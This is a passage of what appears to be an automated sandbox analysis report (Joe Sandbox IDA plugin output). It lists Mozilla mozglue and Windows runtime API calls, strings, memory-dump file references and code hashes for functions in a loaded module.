                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6B0AF386
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6B0AF347
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6B0AF3C8
                                                                                                                                                        • free.MOZGLUE(00000000,00000000), ref: 6B0AF3F3
                                                                                                                                                        • free.MOZGLUE(00000000,00000000), ref: 6B0AF3FC
                                                                                                                                                        • free.MOZGLUE(00000000,?,?,00000000), ref: 6B0AF413
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                                                                                                        • String ID: ntdll.dll
                                                                                                                                                        • API String ID: 301460908-2227199552
                                                                                                                                                        • Opcode ID: 215eab96c7ddd8444f18d1301218ee7ffe73674415a37c21f634def7ee42904c
                                                                                                                                                        • Instruction ID: a829bed5ea34c45bcb57c3fc0183eaec60356f3e8a8344134738419c2d2c14fd
                                                                                                                                                        • Opcode Fuzzy Hash: 215eab96c7ddd8444f18d1301218ee7ffe73674415a37c21f634def7ee42904c
                                                                                                                                                        • Instruction Fuzzy Hash: 6441E1B6E002049BDB0CAFA9E84179A7FF9FF45314F104829D91AE7382EB39E945C741
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6B0FF618), ref: 6B0D6A68
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6B0D6A7D
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6B0D6AA1
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FF618), ref: 6B0D6AAE
                                                                                                                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6B0D6AE1
                                                                                                                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6B0D6B15
                                                                                                                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6B0D6B65
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FF618,?,?), ref: 6B0D6B83
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                                                                                                                        • String ID: SymInitialize
                                                                                                                                                        • API String ID: 3103739362-3981310019
                                                                                                                                                        • Opcode ID: 4655952935df1365f19bce7c14a88377110304ded21db9dd042de4910248674b
                                                                                                                                                        • Instruction ID: 1bbb89fe47e9664f69037f247a989b632a74f2bd2956ddf106790ea32065c282
                                                                                                                                                        • Opcode Fuzzy Hash: 4655952935df1365f19bce7c14a88377110304ded21db9dd042de4910248674b
                                                                                                                                                        • Instruction Fuzzy Hash: 68419F71705344AFDB00CFB4D889B9A3FEDAB46304F0441B9ED898B282EBB5D544CB61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BDBE1
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BDBE9
                                                                                                                                                          • Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
                                                                                                                                                          • Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508
                                                                                                                                                        • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6B0BDC5D
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6B0BDC7F
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                          • Part of subcall function 6B0B9A60: GetCurrentThreadId.KERNEL32 ref: 6B0B9A95
                                                                                                                                                          • Part of subcall function 6B0B9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0B9A9D
                                                                                                                                                          • Part of subcall function 6B0B9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0B9ACC
                                                                                                                                                          • Part of subcall function 6B0B9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0B9BA7
                                                                                                                                                          • Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6B0B9BB8
                                                                                                                                                          • Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6B0B9BC9
                                                                                                                                                          • Part of subcall function 6B0BE8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6B0BDCF5), ref: 6B0BE92D
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BDD1B
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BDD44
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BDD58
                                                                                                                                                          • Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
                                                                                                                                                          • Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6B0BDBF2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
                                                                                                                                                        • String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
                                                                                                                                                        • API String ID: 3378208378-1387374313
                                                                                                                                                        • Opcode ID: 5b429fb17b45508d2c4f863af36fdaa607abacab14607c2b1b7cd9896afcdd21
                                                                                                                                                        • Instruction ID: 42ef65c0672cdc25bb5dd7ce8c9af03732e95f30028cf8f47f30f9b9a63be35c
                                                                                                                                                        • Opcode Fuzzy Hash: 5b429fb17b45508d2c4f863af36fdaa607abacab14607c2b1b7cd9896afcdd21
                                                                                                                                                        • Instruction Fuzzy Hash: 95819E746007048FCB28DF24D485B6AFFE5EF89308B108A2DD89B87791DB39E949CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C0039
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0C0041
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C0075
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C0082
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000048), ref: 6B0C0090
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0C0104
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C011B
                                                                                                                                                        Strings
                                                                                                                                                        • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6B0C005B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                                                                                        • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                                                                                        • API String ID: 3012294017-637075127
                                                                                                                                                        • Opcode ID: 61ae18c85400d1b1e5631a1b8b43db24be66bae2ee8d278f693b0ff382fabe65
                                                                                                                                                        • Instruction ID: 34d887fcf9b428f13417ee05919d02eeb1bd958e5d4be28bb25c3c4c6937c956
                                                                                                                                                        • Opcode Fuzzy Hash: 61ae18c85400d1b1e5631a1b8b43db24be66bae2ee8d278f693b0ff382fabe65
                                                                                                                                                        • Instruction Fuzzy Hash: 6C417AB5A002049FCB18CF64D881A9BBFF9FF49214F40451AED5A83750E735E805CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,6B093F47,?,?,?,6B093F47,6B091A70,?), ref: 6B07207F
                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,6B093F47,?,6B093F47,6B091A70,?), ref: 6B0720DD
                                                                                                                                                        • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6B093F47,6B091A70,?), ref: 6B07211A
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE744,?,6B093F47,6B091A70,?), ref: 6B072145
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6B093F47,6B091A70,?), ref: 6B0721BA
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE744,?,6B093F47,6B091A70,?), ref: 6B0721E0
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE744,?,6B093F47,6B091A70,?), ref: 6B072232
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                        • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                        • API String ID: 889484744-884734703
                                                                                                                                                        • Opcode ID: c85bfba23becae29d94ee9507a9c4ec5d5d1c5a131b338f95d5884bc11e351eb
                                                                                                                                                        • Instruction ID: a8b00f4b08f11dc848fdae0a96711f80208c5633b938919bea965e10b6d72d1c
                                                                                                                                                        • Opcode Fuzzy Hash: c85bfba23becae29d94ee9507a9c4ec5d5d1c5a131b338f95d5884bc11e351eb
                                                                                                                                                        • Instruction Fuzzy Hash: D961E231F002168FCB28DE78C885B6EBFF6BF96314F158179E924A7294D738D801CA95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6B0B483A,?), ref: 6B074ACB
                                                                                                                                                        • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6B0B483A,?), ref: 6B074AE0
                                                                                                                                                        • moz_xmalloc.MOZGLUE(FFFE15BF,?,6B0B483A,?), ref: 6B074A82
                                                                                                                                                          • Part of subcall function 6B08CA10: mozalloc_abort.MOZGLUE(?), ref: 6B08CAA2
                                                                                                                                                        • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6B0B483A,?), ref: 6B074A97
                                                                                                                                                        • moz_xmalloc.MOZGLUE(15D4E801,?,6B0B483A,?), ref: 6B074A35
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6B0B483A,?), ref: 6B074A4A
                                                                                                                                                        • moz_xmalloc.MOZGLUE(15D4E824,?,6B0B483A,?), ref: 6B074AF4
                                                                                                                                                        • moz_xmalloc.MOZGLUE(FFFE15E2,?,6B0B483A,?), ref: 6B074B10
                                                                                                                                                        • moz_xmalloc.MOZGLUE(8E8E0022,?,6B0B483A,?), ref: 6B074B2C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4251373892-0
                                                                                                                                                        • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                        • Instruction ID: f1cca6c154191f45754655446de4081585f911ace3e80387398135ebb9c93961
                                                                                                                                                        • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                        • Instruction Fuzzy Hash: 70716DB1900706AFCB68DF78C481AAAFBF5FF08308B50467ED55A8B641E735E655CB80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CABB4
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B084A63), ref: 6B0CABC0
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32 ref: 6B0CAC06
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CAC16
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CAC27
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32 ref: 6B0CAC66
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0CAD19
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6B0CAD2B
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6B0CAD38
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167474191-0
                                                                                                                                                        • Opcode ID: 2989aa79d9b93b961fdd5f6b40fff2ff2fbdfcbda9a84788d2f58632e14d5712
                                                                                                                                                        • Instruction ID: 0d1822dc80e107a2c0d1c3ba82b77d512061a46a58d95b9635c54d9f8b575bde
                                                                                                                                                        • Opcode Fuzzy Hash: 2989aa79d9b93b961fdd5f6b40fff2ff2fbdfcbda9a84788d2f58632e14d5712
                                                                                                                                                        • Instruction Fuzzy Hash: E7514674600B058FC728DF25C48875ABBF6BF89314F204A1DE9AA87765EB35F844CB42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCB52
                                                                                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCB82
                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCB8D
                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCBA4
                                                                                                                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCBC4
                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCBE9
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6B0CCBFB
                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCC20
                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCC65
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2325513730-0
                                                                                                                                                        • Opcode ID: acb3eabe83876f3a0ea44489d87a95791bfbb6c765ca28a0610bf8e119c5cdf6
                                                                                                                                                        • Instruction ID: 70e517a8edbbe3b3e049cf80ca27aff91f8f400a7656b2f67b2f1dcb80fc4738
                                                                                                                                                        • Opcode Fuzzy Hash: acb3eabe83876f3a0ea44489d87a95791bfbb6c765ca28a0610bf8e119c5cdf6
                                                                                                                                                        • Instruction Fuzzy Hash: 9A4161307002059FCB14DF64C899B5E7FF9AF89354F044068E90A97352EB39D845CF92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6B07BC03
                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6B07BD06
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                        • String ID: 0$0$y
                                                                                                                                                        • API String ID: 2811501404-3020536412
                                                                                                                                                        • Opcode ID: a89275c32f9f0079a09e258357eb7a58c7c80da0b12ec24513f75a7a01a8f335
                                                                                                                                                        • Instruction ID: f5e33cf6076c2fa82afe6e17bb5856b4543435def790489362eacad66dd63bc7
                                                                                                                                                        • Opcode Fuzzy Hash: a89275c32f9f0079a09e258357eb7a58c7c80da0b12ec24513f75a7a01a8f335
                                                                                                                                                        • Instruction Fuzzy Hash: 1D61C371A083448FC728EF38C5A175BFBE5FF89384F008A6EE88597251EB34D9458796
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000000C,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080A72
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080AF5
                                                                                                                                                        • free.MOZGLUE(00000000,?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080B9F
                                                                                                                                                        • free.MOZGLUE(?,?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080BDB
                                                                                                                                                        • free.MOZGLUE(00000000,?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080BED
                                                                                                                                                        • mozalloc_abort.MOZGLUE(alloc overflow,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080C0A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                                                                                                                        • String ID: alloc overflow
                                                                                                                                                        • API String ID: 1471638834-749304246
                                                                                                                                                        • Opcode ID: 1f9952f8d87be3784e7841dcd6424da9879ac307f71b03ad2404a5e6d0577b6c
                                                                                                                                                        • Instruction ID: 53db57db8543686a8b06e0826ed972af0c2bb1e4c9434944165b7409f79f97ee
                                                                                                                                                        • Opcode Fuzzy Hash: 1f9952f8d87be3784e7841dcd6424da9879ac307f71b03ad2404a5e6d0577b6c
                                                                                                                                                        • Instruction Fuzzy Hash: C951B2B4A052068FDF28CF28D8C0B5EBBB6FF48308F54496DC45A9B211FB75A644CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • free.MOZGLUE(?,6B0F008B), ref: 6B077B89
